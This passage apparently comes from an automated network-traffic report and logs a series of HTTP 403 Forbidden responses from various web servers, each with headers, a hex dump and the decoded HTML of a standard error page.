              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:27:38 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FeUB7E%2F1srt%2F4JmET5o0OWFzCRBrVi9nluDMyoAe0bF0beGA5E3ZGoIwmsV9hLrzCMUhcHh2xnEMwQzJzWThxmNGPJmusJeajxIaOcOw%2F5YKcFsIwUV3sBmTRWPj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e75d26e5f182d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 15e5<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:23 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:26:55 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:23 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:23 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 806e75d5ba23c34d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:23 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:24 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:24 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:24 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Fri, 19 Feb 2021 02:51:55 GMTETag: "713-5bba788fb1c60"Accept-Ranges: bytesContent-Length: 1811Keep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 